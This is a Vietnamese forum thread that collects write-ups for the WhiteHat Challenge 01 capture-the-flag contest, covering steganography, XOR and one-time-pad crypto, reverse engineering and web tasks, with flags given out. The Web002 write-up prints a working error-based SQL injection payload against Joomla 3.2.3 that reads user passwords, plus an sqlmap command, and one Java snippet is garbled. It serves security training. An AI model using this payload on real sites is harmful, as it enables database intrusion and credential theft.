Tổng hợp Write-up cuộc thi An ninh mạng WhiteHat Challenge 01

sunny

VIP Members
30/06/2014
869
1.849 bài viết
Tổng hợp Write-up cuộc thi An ninh mạng WhiteHat Challenge 01
Write-up các bài thi của WhiteHat Challenge 01 sẽ được tổng hợp tại đây, rất mong các đội chơi chia sẻ đáp án các bài thi để các bạn thành viên tham khảo.

writeup.jpg

Các bài thi trong WhiteHat Challenge 01: (chi tiết writeup ở các post bên dưới)
  1. For001
  2. Crypto002
  3. Crypto001
  4. Mics001
  5. Pwn001
  6. Re002
  7. Pwn002
  8. Re001
  9. Web001
  10. Web002

WhiteHat Challenge 01 - cuộc thi Capture The Flag mới của WhiteHat, được tổ chức định kỳ hàng tháng dành cho những người mới bắt đầu học tập, nghiên cứu về An ninh mạng như những quản trị hệ thống muốn tìm hiểu về An ninh mạng, sinh viên các trường kỹ thuật...
  • Hình thức thi: Thi theo đội, số lượng thành viên không giới hạn
  • Thời gian tổ chức: Từ 09:00 đến 17:00 thứ 7 ngày 25/02/2017
  • Môi trường thi: Hệ thống WhiteHat WarGame
  • Nội dung thi: CTF Jeopardy bao gồm: Reverse, Pwnable, Web, Crypto, Forensic.
  • Thể lệ cuộc thi: Tham khảo tại thông báo Thể lệ cuộc thi An ninh mạng WhiteHat Challenge 01
Giải thưởng:
  • Giải Nhất : MeePwn (Việt Nam) - 5 triệu đồng
  • Giải Nhì : NightSt0rm (Việt Nam) - 2 triệu đồng
  • Giải Ba : 0xc500 (Việt Nam) - 1 triệu đồng
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Write-up bài For001 - Tác giả: noraj
Link: http://rawsec.ml/en/WhiteHat-Challen...001-Forensics/

________________________________
CTF

Description
Can you find the secret in this image? Download file here:

http://material.wargame.whitehat.vn/...a3df14be5d.zip

Submit WhiteHat{sha1(flag)}
Solution


The zip contain an image: LSB.png.

Let's try to retrive something with LSB attack, I found a Microsoft Word 2007 document.

Trying to open it with LibreOffice said me that the document is corrupted.

As it is only an archive I extrated it with 7z.

I then open the document.xml and I found that:

1. .- ... -.-- ..-. --- .-. . -. ... .. -.-.


It is morse. So I used http://www.dcode.fr/morse-code to decode the message.

That gave me EASYFORENSIC.

1
2
3
4
$ printf %s 'EASYFORENSIC' | sha1sum
ffed6da75c3296041fc52abc75298e120c350917 -
$ printf %s 'easyforensic' | sha1sum
1f0aa393d3e5369f391c35a793bcf1178b8299a0 -


So flag is WhiteHat{1f0aa393d3e5369f391c35a793bcf1178b8299a0} .

Note: Again, this is stegano not digital forencis...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
[WRITE UP] WHITEHAT CHALLENGE 1 – WEB002 - JoseBeo

Link: https://mrdoan1996.wordpress.com/201...enge-1-web002/
_____________________

Đã lâu rồi mình chưa viết lại write up ctf mà chỉ tập luyện cùng những đàn anh trong team MeePwn. Bây giờ mấy anh đi thi cả rồi mình mới mạn phép write up một bài khá dễ ở giải WhiteHat Challenge 1 – 2017

Hien is creating an e-commerce website. However, without deep knowledge about the CMS used, Hien leaves a critical vulnerability in his website. Can you help him to find it out?

Website URL: http://lab11.wargame.whitehat.vn/015...0e301973c99d40


nV3ziJhCAUQUqxmO5lePpxwfXB3xR1fgyDw8Ca9w8s8XA-5fvO2QsZXwZ4Odg8rkgxWQoUP6e9Nk-d4wLsTdDAYMG1-rnT66gj96kMYpWbEHucDzvl5mKIGyv5fEYnKnDYD8FHDZsPU5skv2F1rYtql6YR-hLzBxcCk3WJxkE10n9ePzm0VUnmg7MvHhsg1KBUgfz6uutJDYUK3FafPi5jsw91EOMqnGMnGYmanAdfMaPz58sOoUAbR9QXugRXYoELIwh_nhN81d-KBa9xo7gY-xIKdV8TuDPaqWwBEXW9c5cWye7CXLeFTVEMYgektmSNanbmTXQVz_jvjjV8k2PGHm3HQkThsxBibdmLuZ9YBWglR_zeecgOyI28R1_z68qz73klpvdrVmzz7prj280jNH3twJRwB8GIdG7IdXH8pW3qrRn-kH8kTAbxPWFQiPOOXzBstJKmn_K89Bx6Nc5stHHUvtFXtkZSiQXy2go-l3FALpqFemPdrxkvtmgGHjt06S_mXUrPdaGE-fJnDmlk51QAYCek4wCb-lbwxi42wFLJ7hX0PkjrIJmlHFaLTE7lVrtrjbDTBojIVBJxwI2OB51l53ns9Xree3cTAFQZMCyA5orrN9=w1178-h662-no





Thoạt nhìn, bài này khá rối với một loại các trang đủ các loại địa chỉ. Nhìn là thấy khó nuốt nên mình chỉ nghỉ đến SQL injection thôi, còn ngoài ra các lỗi khác mình “không dám” nghĩ đến. Đầu tiên thì fuzz nó trước đã.

Xem file robots.txt có gì nào.

Mã:
 # If the Joomla site is installed within a folder such as at # e.g. www.example.com/joomla/ the robots.txt file MUST be # moved to the site root at e.g. www.example.com/robots.txt # AND the joomla folder name MUST be prefixed to the disallowed # path, e.g. the Disallow rule for the /administrator/ folder # MUST be changed to read Disallow: /joomla/administrator/ # # For more information about the robots.txt standard, see: # http://www.robotstxt.org/orig.html # # For syntax checking, see: # http://tool.motoricerca.info/robots-checker.phtml  User-agent: * Disallow: /administrator/ Disallow: /bin/ Disallow: /cache/ Disallow: /cli/ Disallow: /components/ Disallow: /includes/ Disallow: /installation/ Disallow: /language/ Disallow: /layouts/ Disallow: /libraries/ Disallow: /logs/ Disallow: /media/ Disallow: /modules/ Disallow: /plugins/ Disallow: /templates/ Disallow: /tmp/
Ta thấy có trang administrator => vào xem.

Chẳng có gì ngoài form đăng nhập khá khó để inject => bỏ qua.

Dựa vào file robots.txt mình biết trang web được viết trên framework joomla.

Mình google để tìm cách xem version của joomla hiện đang xài. bằng cách xem nội dung file:
Mã:
[joomlasite]/administrator/language/en-GB/en-GB.xml

2idJrwSYtBFVaBQDI3fmVZUlY6cBoONnR_aGhSrUNhGip98XzcK_AN0P3wrjLh2w-cjz52UqF0lnvjW1OXxjE8G9JngV0rULmMxkMPlKVKiO_Ide4xJ2fJHSHBnYJnzQ_gt_kZsnRDl5AqE9JJynllHwIjkatk5RJjoIF16u5wTesOJ8KFlsLzKKBRNwECZGI3vQfv_twSlOlZzI6l4muO8VOuN9kd0-ZBvs-dLjlDJTV8hNe07QUBsQfKcWGThvGdlODuK-AYNsjyNtaQRAliMjSp_r5iaiIo_xHeuN2aOayoNNesVbyx5GHGKvihAxIG42XQh7q398Nc5xiCOpkuHj7YSq8DFl2qXCHEYqK9SnL5NhOUEH9vcUjTBo6VdTYSd-Gaoo1Fk1moMJM-yrOpUBOHS4B47JqdRQZRZttEqAMgr2qQjQlvZut24bNiloej3C3Y2DADJzaj4dohiX8c6QTBP9pDhvWY1TsvCHv5kYUIZVJHnpldUJhBcsYOySsUCJxbNKHhDP6KLPDFxHopAtcZIYNTVudNg30Cv7qXIZUa_TZ4vK1GSXDO4Jy2jRl6CMePa3A55tD4Fil7K1Jk9z1pZSCnCrWjxwFz6xSPnJT5p8muk8=w1178-h662-no



Trang web của chúng ta có version là 3.2.3 => google xem joomla 3.2.3 có lỗi nào không.

Sau 2h ngồi đọc đủ loại vulnerability liên quan thì mình đã tìm được.

https://www.exploit-db.com/exploits/38534/

Cơ mà đời không như mơ, chạy tool exploit chẳng được kết quả gì cả. Mình quyết định xem code exploit người ta làm sao thì thấy một đoạn payload rất đơn giản:
Mã:
"/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";
Như vậy có thể biết được url bị lỗi nằm ở:
Mã:
"http://lab11.wargame.whitehat.vn/0153e4391b209fd6c30e301973c99d40/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]="

và có thể inject ở biến list[select]

Nhưng vì đời không như mơ nên chắc là payload của tool có lỗi gì đấy. Mình quyết định sử dụng sqlmap (vì mình khá lười query tay hay code tool). Bật kali linux lên

Sử dụng sqlmap với lệnh sau:
Mã:
sqlmap -u "http://lab11.wargame.whitehat.vn/0153e4391b209fd6c30e301973c99d40/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=" -p list[select]


pU6xADMqzn8WRN8xvPjzWvEOsMClLh58Im3bOJxMSUm-iABd-3t9nDZJtV4vr586lyYDyrg0jY3GzP78jX8W1A1NmfE0xHyXzKfiDTTuSRgu1oAp8mJdM4x0fF-tn8yZMxtS2OMYDTxETeUDcC9_PLQ51urQf0khd28i8OJS-6CpgzLOJ9lI23_SytwsP-eDz4JRG8NfZTGrIcN2RO1LwiVkGg2bqwP36qHVC1eIeOKJW1cIcW-5kNSOw3nT1cSMNC3ifsPaZL9EjP1h-carlMP9l_iAVCfnVKUPXv1va_V8lEACjJNYL5UMBpIza_7UOtMd2ZH1G4rdK0L2xqWoW_6FcMCKRXEROnhPEqJvZ_0Jv2cq7PJ_EvHY0p8iAtk8Bzr11wrdbF0rNtx4Ew-jbXxmaFCTflLP88KgvvTXvbdRxA78NKXBNWkThz8XHDt7YD73AP_wmV2AMTNHiSyobXVuhwmPLBmjpDpX6UnMB6r1pOQP1o0X2dUjatq-KQHqIRqoKQsWig-6dkvIOFua0TK6TYHNhuaD1ey98d0wSL3XcF_O2Cv1DlvkkNq3t765i29mqrNOB_bAj3kbhZWnZak1tgb4HYcKbyiMjK3YYUm0URo4kHVu=w1178-h662-no



Vâng, kết quả là MySQL với Error base => tìm database của nó thôi


ggWgoZs5yrfHLw4l8il4IUBrkDljj3-2YxgV8brrli84GtSyCC6BxsnxjKNcDYG8WsYvsVXnPxkzr8NP1wOpWMZjJa6KWXzBz5Yy1rMcsIqCXrRQpLPWKvOvPOVaheKD6qq9cgj5B8ukkmi7I_v1Q36s1oUFFws8RVkZ1Q3P_Vc1IfGK3z_ANUmxN4yDwlZT1NSVxIrdcfpOBRZXDDD6yfsGrhdy9Z4kA54l64UyYjmnxkIQM2Wz1GLK7MLMHBDzayoeVuD7Njb6ntLUyr5ZSsY5YuSY67pk6AUi0Swtb3znHLSROHmnHm3tBQkua9HBe5ozq34WzbS0lB726PBcrPbacOQKfz5nD2IYe7cHduyxJzsfj1WMBP4JyV_T59tpJXyLtKpRhEYjw4MlyiKAF7WLu8YzUFaBAizq4NiBEJ3SlRHSDnH9o3Tai02R-AIqTBhLukhluTRwhyDGiFYH1AF2vG1PvHyhWwnz2OKYxrQIKKYlRzYNlY9lga9k4lwCGonGEzlFgOUUejL66idng98V9imMAO5neSPP0s0tW3xp5LOctnM9DfxO_yV8yYvdNgMC8eDeYuMW8J1jzk5a36uEYbp13UWGLZqRCPuYTRf8i7Tc4utL=w562-h316-no



Chúng ta có database rồi, việc còn lại là chạy tool tìm tables, columns và dump column muốn xem ra thôi.

Ez flag: sqli_in_old_version_of_joomla
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bài for100 làm sao để tách các file lẫn lộn ra ạ. Em thử làm mà không được. Có video thì tốt quá. :(
Cảm ơn hai anh sunnyHD67. Em đã làm được bài for100 rồi ạ. :D
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
For100 bạn có thể search keyword LSB Steganography, trong bài này có thể dùng tool StegSolve để giải.


1489939954Flag.PNG

image_7592.jpg

Flag.jpg

Flag.jpg
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Write-up Crypto001 from MeePwn:

Đề đã cho biết: "The text message has been encrypted using one time pad algorithm. Let decrypt it."
Với dạng bài này thì chúng ta có nhiều cách giải quyết, chủ yếu dựa vào tính chất của phép xor: A ^ B = C => A ^ C = B; B ^ C = A

Để giải bài này một cách đơn giản, xin giới thiệu với các bạn một tool khá hay, cribdrag:
1489939954Screenshot 2017-03-01 at 13.27.07.png




Bây giờ chúng ta chỉ việc đoán xem nội dung của "key" và "message" là gì, việc này cũng không có gì phức tạp. "message" có thể chứa các keywords "nhạy cảm" như: "Flag", "flag", "flag is ", "flag is: ", "WhiteHat",....; còn "key" thì cũng có thể chứa "I", "you", "and", "not", " the ",....

1489939954Screenshot 2017-03-01 at 13.32.45.png



Tiếp tục đoán như vậy, cuối cùng ta được "key" là "I can calculate the motion of heavenly bodies" (có thể còn nữa, nhưng chỉ cần chừng này là đủ để có flag rồi)
1489939954Screenshot 2017-03-01 at 13.37.16.png

Screenshot 2017-03-01 at 13.27.07.jpg

Screenshot 2017-03-01 at 13.32.45.jpg

Screenshot 2017-03-01 at 13.37.16.jpg
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Write-up Crypto002 from MeePwn:

Đề cho một file python, và một file đã bị encode bằng thuật toán trong file python đó. Theo như mô tả thì file gốc là file PNG.
"This PNG image has been encrypted. Let recover it. "

Nội dung trong file encode cũng không có gì quá phức tạp, chỉ là đọc từng 8 bytes một trong file ảnh, xor với một key cho trước, và ghi lại vào file PNG mới.

Như đã nói ở write-up trước, vì tính chất của phép xor: A ^ B = C => A ^ C = B; B ^ C = A nên chúng ta hoàn toàn có thể có được key dùng để xor, bằng cách dùng 8 bytes đầu tiên trong file đã encode, xor với 8 bytes đầu của một file PNG bất kỳ (vì trong cấu trúc file PNG 8 bytes header đầu tiên luôn luôn không đổi, tham khảo thêm ở http://www.libpng.org/pub/png/spec/1.2/PNG-Structure.html)

Code một chút để lấy key:
1489939954Screenshot 2017-03-01 at 14.06.33.png


Dùng key thay vào ngay code đề cho, sửa lại vị trí của file input và output, chúng ta có flag.

1489939954images.png

Screenshot 2017-03-01 at 14.06.33.jpg

images.jpg
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
HD67;n63377 đã viết:
For100 bạn có thể search keyword LSB Steganography, trong bài này có thể dùng tool StegSolve để giải.


1489939954Flag.PNG

sao em ko mở đc file flag ạ. E lưu đoạn hex đó dạng rar hay zip đều ko mở lên đc ạ
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Write-up bài For001 - Tác giả: NGUYỄN VIỆT DŨNG - MEPWN - UIT.RTHN

____________________________________


File của ban tổ chức:

http://material.wargame.whitehat.vn/...a3df14be5d.zip

Mình tải cái file này về và giải nén ra thì thấy có dạng ảnh png

Mở file bằng StegSolve :
M1bY0PVyuWi8RR2K8jpVXD6m-pe4DH6iD_TwSjrf-Ls-MsT8ernTlptRTuQiBHllrCx0ZDoxRcuQFJjhn5VQyQwExugiajsbj3J5__KQ7afQmhZQcfvTA7tvKFJNmwIMOD7C7jSfC-Q1wmV8NQ





Thấy tên ảnh là LSB.png, btc đã lịch sự đưa ra gợi ý rõ ngay từ tên bài, vậy thì dễ rồi:
evRmi4ll0NpKqQUxBp8RT0SKIreYZDqAwWXjlfzEa3JGEgvGu_o0Xa2QKay_QUIVhcQJUT-zDQpZkqCBDPlwSXZrCPGGI4IN3w2EIHnNhrBE5okhBblMoxAgfEKpFSxPFM0Pt6-5WSh5xsycKQ





Ta thấy rõ rang có file Header khá đặc trưng của dòng MS-Office, kệ nó cứ extract data ra đã rồi tính : save bin

Lưu file đó với tên extract.docx, sau đó mở file
NC8GuUThNtIzWdhL1MccfjfA-FWEcApLHWMKdkLU5fzgw8BtgG64_9xdKjOhDzQggqcKufYJh6Y-dtDf4HjAnkB_-78emGa-c3eY3n43cLqGdyInogUpMvhxH0wVL8iJJvEYwm7RaJsvUvchYw





LUL, mấy cái đúp đúp nháy nháy => Mã Morse

Decode mã Morse ra, ta có dòng :

EASYFORENSIC => Sha1 là ra flag thôi !

Bạn mình cũng đã làm ra bước này, nhưng cu cậu không sao submit được, mình đợi đến 15p thì cu cậu bảo đi đâu đó.

Cuối cùng thì mình sub, đơn giản là lowercase chúng nó xuống rồi mới Sha1 (Cái này có 1 file khá đặc sắc đã nhắc mình)

WhiteHat{1f0aa393d3e5369f391c35a793bcf1178b8299a0}
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
ROLLDOCK: bạn lưu dữ liệu ra dưới dạng file .docx và mở bằng Word hoặc mở bằng 7-zip. Nếu mở bằng 7-zip thì bạn phải tìm và mở file document.xml để thấy đoạn Morse code trong đó.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Write-up bài Re002 - Tác giả: MEPWN

_____________________________________

Đặt breakpoint debug ở hàm này

AE0VtJTWHPtH2-yUQhqDYSo7Xojkg8zfVj7A2tBYFo0jJQu8C1EUG2ZrLdkWvStWIlcU0OKjnDRfYmEJqkSU9182ZFbyJDP84Ktv6VQCNecZvS50ozCIeMuwrkDQb0rWeHGIrqa3c3AYWjTLZA




Thuật toán hàm này

hLzZh1Kg7yVRgR6yKm3lwGPu_w1bcPH_nej6Lx9jmyDx5HwsLWR0mHH3IN4h3xYOYCZCmANqkUxpfnMZKMoUYBfflv63CdViHl_SCOLd2RJZDJQXqjg6RwP8UYtRBYS14pH9xLxE1it6vsOJGA

















Thật ra nó là Caesar vs key = (input[0]-‘A’) + (input-input[i-1]) + … + (input[n]-input[n-1])

Ta chỉ cần giải mã Caesar với chuỗi “NMOVUMUUHUGCMOTOGCNUEY” và kiểm tra chuỗi input nào có kí tự cuối là “E” thì chính là cái ta cần

pXF5CyPC6zND7KO5EIfXgJ9h_CyXD26gHwgYef1qvYYzq3frA2Q-i7SVKGbxIoA5y29n82bh6gb0atXcFeP57dbIM1EbdcE5_mZk3vjZlqlBotsfDdJQeaG09zkZtVtKEKPmGEvpAviekNhcJQ





Password là “TSUBASAANAMISUZUMITAKE”
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: likehack
Comment
Write-up bài Re001

Dạng bài này mình không quan tâm nó tính cái gì trên giao diện, random cái gì đó lằng nhằng.
Dịch file jar, vô thấy ngay hàm tính flag
link video: https://www.youtube.com/watch?v=lQPTFnwI1rc
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Write-up bài Re001

Dạng bài này mình không quan tâm nó tính cái gì trên giao diện, random cái gì đó lằng nhằng.
Dịch file jar, vô thấy ngay hàm tính flag
link video: https://www.youtube.com/watch?v=lQPTFnwI1rc
update:
code:
public static void main(String[] args) {
Character[] ListChar = { Character.valueOf('a'), Character.valueOf('_'), Character.valueOf('y'), Character.valueOf('l'), Character.valueOf('_'), Character.valueOf('l'), Character.valueOf('a'), Character.valueOf('T'), Character.valueOf('_'), Character.valueOf('T'), Character.valueOf('_'), Character.valueOf('T'), Character.valueOf('e'), Character.valueOf('_'), Character.valueOf('y'), Character.valueOf('e'), Character.valueOf('r'), Character.valueOf('_'), Character.valueOf('S'), Character.valueOf('_'), Character.valueOf('_'), Character.valueOf('l'), Character.valueOf('r'), Character.valueOf('T'), Character.valueOf('F'), Character.valueOf('_'), Character.valueOf('Y'), Character.valueOf('_'), Character.valueOf('l'), Character.valueOf('e'), Character.valueOf('T'), Character.valueOf('T'), Character.valueOf('T'), Character.valueOf('a'), Character.valueOf('r'), Character.valueOf('T'), Character.valueOf('u'), Character.valueOf('A'), Character.valueOf('o') };
int[] ListPos = { 11, 7, 14, 13, 26, 22, 4, 34, 15, 37, 3, 31, 19, 27, 23, 6, 18, 25, 30, 24, 17, 12, 9, 38, 28, 8, 0, 16, 21, 10, 32, 36, 33, 20, 5, 35, 2, 29, 1 };
String flag = "";
Character[] tmpListChar = { Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000'), Character.valueOf('\000') };
int lenFlag = ListChar.length;
for (int i = 0; i < lenFlag; i++) {
tmpListChar[ListPos] = ListChar;
}
for (int i = 0; i < lenFlag; i++) {
flag = flag + tmpListChar;
}
System.out.print(flag);
}
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên